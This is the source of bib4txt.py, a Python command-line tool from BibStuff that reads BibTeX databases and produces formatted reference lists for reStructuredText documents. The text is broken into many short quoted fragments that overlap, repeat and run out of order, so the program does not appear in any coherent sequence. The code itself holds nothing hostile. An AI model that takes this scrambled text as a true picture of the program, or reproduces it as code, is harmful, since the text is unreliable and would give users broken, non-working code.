"argparse import ArgumentParser _usage = \"\"\" usage: %(prog)s [options] BIB_DATABASE standard usage: %(prog)s",
"Outputs a sorted list of citation definitions, to be used in the References",
"a script # style # bibfile_processor # note that the standard separator for",
"found keys (an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make the citation definitions for",
"result+'\\n' # ds added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for",
"this case, the reference list is added to the end of the file.",
"a comma # CITATION_SEP = ',' # set in styles/shared.py def make_text_output(src_as_string, src_parser,",
"overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\",",
"open output file for writing (default: stdout) if args.outfile: if os.path.exists(args.outfile) and not",
"bib4txt_logger.info('fill cite processor with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys",
"for the citations referenced - a sort-key on which to base the sorting",
"bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1) # read input file",
"(see `license.txt`_) :note: now allows multiple database (.bib) files :note: bib4txt supercedes addrefs.py,",
"intext citations and the bibliography\"\"\" #first: create a citation manager to handle the",
"citations_only: result = cite_processor.__repr__() + result return result+'\\n' # ds added newline 2008-06-27",
"print DEBUG messages; 1: print INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False,",
"open: \"+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse:",
"bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1) # read",
"args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1) #",
"if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\":",
"citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to process cites during",
"= args.style if \".\" in stylename: bib4txt_logger.warn(\"use the -f option to pass a",
"is also associated with citation_manager which holds the bibliography, so we can make",
"have if you have this) The source text file should include citation references",
"the TODOs in the associate BibStuff files, especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html",
"help=\"Set logging level to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib files for",
"permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST and will be recognized",
"input and output _infile = sys.stdin _outfile = sys.stdout from argparse import ArgumentParser",
"-i reST_FILE -n -o refs_FILE BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__)",
"parsed .bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result =",
"(without using LaTeX or bibtex). Dependencies: - Python 2.4 or higher - SimpleParse",
"the References section of your documents. :author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright:",
"if desired if not citations_only: result = cite_processor.__repr__() + result return result+'\\n' #",
"filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \" bibfiles=%s\", \" infile=%s\", \"",
"action=\"store\", dest=\"infile\", help=\"Parse FILE for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write",
"appear to be a .bib file.\"%bibfile_name ) try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append(",
"error handling for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import bibstuff.bibstyles.%s",
"default=\"default\", help=\"Specify user-chosen style (by style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print",
"holds the cite keys. It is also associated with citation_manager which holds the",
"enclosed in brackets, followed by an underscore. Citation keys cannot be all digits.",
"already exists: Use -n option to nuke (overwrite) this file. PLEASE CHECK FILE",
"style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import bibstuff.bibstyles.%s as style\"%stylename workaround = {}",
"(default: stdout) if args.outfile: if os.path.exists(args.outfile) and not args.overwrite: _msg = \"\"\"ABORTED because",
"is currently allowed: - Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008)",
"bibstuff.bibstyles.%s as style\"%stylename workaround = {} #work around Python 2 exec vs Python",
"based on `stylefile` command-line option #TODO: add error handling for unknown styles style",
"\"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\",",
"- a sort-key on which to base the sorting :note: Sorting is style",
"GLOBALS ################################################## # some globals are set when this file is run as",
"user to run without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir)",
"keys cannot be all digits. The source document can be output with formatted",
"taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys holds the cite keys. It",
"to store parsed .bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.')",
"include citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed in",
"bibfiles_as_strings ) def main(): \"\"\"Command-line tool. See bib4txt.py -h for help. \"\"\" #set",
"__docformat__ = \"restructuredtext en\" __version__ = \"1.1.4\" __needs__ = '2.7+' ################### IMPORTS ##################################################",
"followed by an underscore. Citation keys cannot be all digits. The source document",
"user-chosen style (by style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO messages",
"we can make a sorted entry list. To do so need: - the",
"bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s",
"def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\":",
"a sorted list of citation definitions, to be used in the References section",
"\"restructuredtext en\" __version__ = \"1.1.4\" __needs__ = '2.7+' ################### IMPORTS ################################################## #import from",
"os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local",
"citations') result = citation_manager.make_citations() #lastly, prepend the entire document, if desired if not",
"styles with the -s option.\") stylename = os.path.splitext(args.stylefile)[0] else: stylename = args.style if",
"_outfile = sys.stdout from argparse import ArgumentParser _usage = \"\"\" usage: %(prog)s [options]",
"your documents. :author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license:",
"parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\",",
"of citation definitions, to be used in the References section of your documents.",
"in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result = make_text_output( _infile.read(), cite_parser,",
"bibdir) from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ################################################## #",
"bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ################################################## # some globals are set when this",
"elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\": bib4txt_logger.info(\"It is currently",
"2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\": bib4txt_logger.info(\"It is currently recommended",
"create a citation manager to handle the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager =",
"__version__ = \"1.1.4\" __needs__ = '2.7+' ################### IMPORTS ################################################## #import from standard library",
"files, especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt",
"a citation key enclosed in brackets, followed by an underscore. Citation keys cannot",
"os.path.splitext(args.stylefile)[0] else: stylename = args.style if \".\" in stylename: bib4txt_logger.warn(\"use the -f option",
"or bibtex). Dependencies: - Python 2.4 or higher - SimpleParse (binaries available!) -",
"level to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib files for the references.\")",
"BibTeX databases found.\") sys.exit(1) # read input file (default: stdin) if args.infile: try:",
"dest=\"entire_doc\", default=False, help=\"Output entire document, making citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\",",
"be written to a separate file. You can then include this in your",
"citation definitions for a list of References bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly,",
"#work around Python 2 exec vs Python 3 exec exec(str2exec, {}, workaround) style",
"#store parsed .bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result",
"when this file is run as a script # style # bibfile_processor #",
".. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\" __docformat__ = \"restructuredtext en\" __version__ =",
"action=\"store\", nargs='*', help=\"The .bib files for the references.\") args = parser.parse_args() if args.logger_level:",
"citation reference is a comma # CITATION_SEP = ',' # set in styles/shared.py",
"references. - Uses SimpleParse_ to convert an EBNF_ grammar into an object for",
"need: - the keys for the citations referenced - a sort-key on which",
"directive. How it works: - Uses SimpleParse_ to convert an EBNF_ grammar into",
"with formatted citation references substituted for the citation keys. In this case, the",
"list is added to the end of the file. A slight modification of",
"works: - Uses SimpleParse_ to convert an EBNF_ grammar into an object for",
"logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local imports try: from bibstuff",
"parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\",",
"prepend the entire document, if desired if not citations_only: result = cite_processor.__repr__() +",
"reST document with an ``include`` directive. How it works: - Uses SimpleParse_ to",
"read input file (default: stdin) if args.infile: try: _infile = open(args.infile, mode='r', encoding='utf-8')",
"Python 2.6 dependencies: with :TODO: address the TODOs in the associate BibStuff files,",
"= '2.7+' ################### IMPORTS ################################################## #import from standard library import importlib, os, sys",
"and the bibliography\"\"\" #first: create a citation manager to handle the bibfile(s) bib4txt_logger.debug('create",
"#third: parse the text (ignore `taglist`; it is a dummy container) bib4txt_logger.info('fill cite",
"parsed .bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.') #store parsed",
"processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore `taglist`; it is a",
"messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire document, making citation reference",
"\"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE",
"parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib files for the references.\") args = parser.parse_args() if",
"help=\"Use experimental document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging level",
"bib4txt_logger.info(\"It is currently recommended to pass styles with the -s option.\") stylename =",
"to pass a style by filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\",",
"#!/usr/bin/env python # bib4txt.py \"\"\" Creates formatted references for a text document. Uuseful",
"now allows multiple database (.bib) files :note: bib4txt supercedes addrefs.py, by <NAME> :note:",
"*not* legal reST. The intent is for the formatted references to be written",
"the sorting :note: Sorting is style dependent---e.g., might sort entries on citation_rank. \"\"\"",
"output file %s already exists: Use -n option to nuke (overwrite) this file.",
"ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp #",
"the references.\") args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity:",
"= \"\"\"ABORTED because output file %s already exists: Use -n option to nuke",
"= open(args.infile, mode='r') except: raise ValueError(\"Cannot open: \"+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest",
"formatted citation references substituted for the citation keys. In this case, the reference",
"args.overwrite: _msg = \"\"\"ABORTED because output file %s already exists: Use -n option",
"cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create object to store parsed .bib file bibfile_processor",
"help=\"2: print DEBUG messages; 1: print INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\",",
"will be recognized by bib4txt. - Comma separted multiple keys are permitted in",
"cite_processor.all_citekeys holds the cite keys. It is also associated with citation_manager which holds",
"= open(args.outfile,'w') # read database (.bib) files bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names)",
"bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1) # read input file (default: stdin) if",
"output _infile = sys.stdin _outfile = sys.stdout from argparse import ArgumentParser _usage =",
"- Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST",
"manager to handle the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE)",
"if not citations_only: result = cite_processor.__repr__() + result return result+'\\n' # ds added",
"is added to the end of the file. A slight modification of the",
"permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal reST. The intent",
"an object for scanning .bib files. (See Bibstuff's bibgrammar.py.) - Extracts the citation",
"pass a style by filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \"",
"style # bibfile_processor # note that the standard separator for multiple keys in",
".bib files. (See Bibstuff's bibgrammar.py.) - Extracts the citation references from the input",
"found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings ) def main(): \"\"\"Command-line tool. See bib4txt.py -h",
"option #TODO: add error handling for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec",
"simpleparse #local imports try: from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError:",
"EBNF_ grammar into an object for scanning .bib files. (See Bibstuff's bibgrammar.py.) -",
"= simpleparse.parser.Parser(ebnf_dec, root='src') # create object to store parsed .bib file bibfile_processor =",
"file.') #store parsed .bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.')",
"CITATION_SEP = ',' # set in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style, #",
"args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp",
"legal reST. The intent is for the formatted references to be written to",
"_infile = sys.stdin _outfile = sys.stdout from argparse import ArgumentParser _usage = \"\"\"",
"bibstyles, ebnf_sp except ImportError: #hack to allow user to run without installing scriptdir",
"slight modification of the reStructuredText ``cite`` directive is currently allowed: - Most characters",
"all found keys (an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make the citation definitions",
"# Create a simpleparse.parser Parser based on the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec,",
"bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result = make_text_output( _infile.read(), cite_parser, bibfile_processor, style,",
"globals are set when this file is run as a script # style",
"with the -s option.\") stylename = os.path.splitext(args.stylefile)[0] else: stylename = args.style if \".\"",
"bib4txt. - Comma separted multiple keys are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_``",
"if args.stylefile != \"default.py\": bib4txt_logger.info(\"It is currently recommended to pass styles with the",
"You can then include this in your reST document with an ``include`` directive.",
"\"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\",",
"arg _infile = open(args.infile, mode='r') except: raise ValueError(\"Cannot open: \"+args.infile) if args.entire_doc: ebnf_dec",
"try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name",
"value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib files for the references.\") args = parser.parse_args()",
"into an object for scanning reST files for citation references. - Uses SimpleParse_",
"CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') # read database (.bib) files bibfile_names",
"citation_manager which holds the bibliography, so we can make a sorted entry list.",
"multiple keys in one citation reference is a comma # CITATION_SEP = ','",
"= bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore `taglist`; it is a dummy container)",
"TypeError: #Python 2 did not accept encoding arg _infile = open(args.infile, mode='r') except:",
"is for the formatted references to be written to a separate file. You",
"to a separate file. You can then include this in your reST document",
"multiple database (.bib) files :note: bib4txt supercedes addrefs.py, by <NAME> :note: Python 2.4",
"installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import bibfile,",
"with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys holds the cite",
"dest=\"infile\", help=\"Parse FILE for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted",
"associate it with the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse",
"be output with formatted citation references substituted for the citation keys. In this",
"bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\": bib4txt_logger.info(\"It is currently recommended to pass styles with",
"args.stylefile != \"default.py\": bib4txt_logger.info(\"It is currently recommended to pass styles with the -s",
"])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import a bibliography style based on `stylefile` command-line",
"workaround = {} #work around Python 2 exec vs Python 3 exec exec(str2exec,",
"in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does not appear to be a",
"1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\": bib4txt_logger.info(\"It is currently recommended to pass styles",
"for a list of References bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly, prepend the",
"bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\": bib4txt_logger.info(\"It is",
"#exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output file for writing (default: stdout)",
"E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST and will be recognized by",
"file parsed.') result = make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only = not args.entire_doc)",
"CiteRefProcessor object to process cites during src parsing # (and associate it with",
"text (ignore `taglist`; it is a dummy container) bib4txt_logger.info('fill cite processor with keys')",
"an object for scanning reST files for citation references. - Uses SimpleParse_ to",
"document. - Outputs a sorted list of citation definitions, to be used in",
"cite_processor.__repr__() + result return result+'\\n' # ds added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names):",
"to parse bib file.') #store parsed .bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor)",
"which holds the bibliography, so we can make a sorted entry list. To",
"messages to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2: print DEBUG",
"bibgrammar, bibstyles, ebnf_sp except ImportError: #hack to allow user to run without installing",
"style module citations_only=True): \"\"\"Create intext citations and the bibliography\"\"\" #first: create a citation",
"the citation definitions for a list of References bib4txt_logger.info('make citations') result = citation_manager.make_citations()",
"- Outputs a sorted list of citation definitions, to be used in the",
"- Extracts the citation references from the input document. - Outputs a sorted",
"\" style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import a bibliography style based on",
"a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal reST. The intent is for",
"to run without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from",
"bibliography, so we can make a sorted entry list. To do so need:",
"Python 2.4 or higher - SimpleParse (binaries available!) - BibStuff (which you should",
"file for writing (default: stdout) if args.outfile: if os.path.exists(args.outfile) and not args.overwrite: _msg",
"chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create object to store parsed .bib",
"also associated with citation_manager which holds the bibliography, so we can make a",
"################################################## # some globals are set when this file is run as a",
"formatted references to be written to a separate file. You can then include",
"key enclosed in brackets, followed by an underscore. Citation keys cannot be all",
"import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ################################################## # some globals are",
"# open output file for writing (default: stdout) if args.outfile: if os.path.exists(args.outfile) and",
"= ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create a simpleparse.parser Parser based",
"This is *not* legal reST. The intent is for the formatted references to",
"running:\", \" bibfiles=%s\", \" infile=%s\", \" outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename)",
"parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\",",
"output with formatted citation references substituted for the citation keys. In this case,",
"How it works: - Uses SimpleParse_ to convert an EBNF_ grammar into an",
"= workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output file for writing",
"import importlib, os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import",
"ebnf_sp.cites_xp # Create a simpleparse.parser Parser based on the chosen grammar cite_parser =",
"metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\",",
"object for scanning .bib files. (See Bibstuff's bibgrammar.py.) - Extracts the citation references",
"os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \" bibfiles=%s\", \" infile=%s\", \" outfile=%s\", \" style=%s\"",
"#parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO messages to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\",",
"files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result = make_text_output( _infile.read(),",
"definitions, to be used in the References section of your documents. :author: <NAME>",
"2.4 or higher - SimpleParse (binaries available!) - BibStuff (which you should have",
"option to nuke (overwrite) this file. PLEASE CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg)",
"manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to process cites",
"action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2: print DEBUG messages; 1: print INFO messages; default=%(default)s\")",
"python # bib4txt.py \"\"\" Creates formatted references for a text document. Uuseful for",
"set when this file is run as a script # style # bibfile_processor",
"metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\",",
"be used in the References section of your documents. :author: <NAME> :date: 2006-07-27",
"import simpleparse #local imports try: from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp except",
"note that the standard separator for multiple keys in one citation reference is",
"\"default.py\": bib4txt_logger.info(\"It is currently recommended to pass styles with the -s option.\") stylename",
"text file should include citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation",
"user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen style (by style",
"<NAME> :license: MIT (see `license.txt`_) :note: now allows multiple database (.bib) files :note:",
"Uses SimpleParse_ to convert an EBNF_ grammar into an object for scanning .bib",
"src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys holds the cite keys. It is also",
"by filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \" bibfiles=%s\", \" infile=%s\",",
"for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import bibstuff.bibstyles.%s as style\"%stylename",
"name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO messages to stdout, default=%(default)s\") parser.add_argument(\"-V\",",
"result = cite_processor.__repr__() + result return result+'\\n' # ds added newline 2008-06-27 ################################################################################",
"files bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases",
"= bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.') #store parsed .bib files in the",
"Extracts the citation references from the input document. - Outputs a sorted list",
"cite_processor.all_citekeys #make the citation definitions for a list of References bib4txt_logger.info('make citations') result",
"= os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \" bibfiles=%s\", \" infile=%s\", \" outfile=%s\", \"",
"\"import bibstuff.bibstyles.%s as style\"%stylename workaround = {} #work around Python 2 exec vs",
"can be output with formatted citation references substituted for the citation keys. In",
"currently allowed: - Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal",
"is now (2008) legal in reST and will be recognized by bib4txt. -",
"dependencies: sets, sorted :note: Python 2.6 dependencies: with :TODO: address the TODOs in",
"the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor",
"bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does not appear to be",
"reST_FILE -n -o refs_FILE BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\",",
"run without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff",
"action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\",",
"keys in one citation reference is a comma # CITATION_SEP = ',' #",
"not args.overwrite: _msg = \"\"\"ABORTED because output file %s already exists: Use -n",
"object to store parsed .bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib",
"to process cites during src parsing # (and associate it with the citation_manager)",
"parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging level to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\",",
"parsed.') result = make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only = not args.entire_doc) _outfile.write(result)",
"importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import bibstuff.bibstyles.%s as style\"%stylename workaround = {} #work around",
"files for citation references. - Uses SimpleParse_ to convert an EBNF_ grammar into",
"to convert an EBNF_ grammar into an object for scanning .bib files. (See",
"with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name )",
"an EBNF_ grammar into an object for scanning reST files for citation references.",
"\"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen style (by style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\",",
"it works: - Uses SimpleParse_ to convert an EBNF_ grammar into an object",
"source text file should include citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a",
"source document can be output with formatted citation references substituted for the citation",
"try: from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError: #hack to allow",
"separator for multiple keys in one citation reference is a comma # CITATION_SEP",
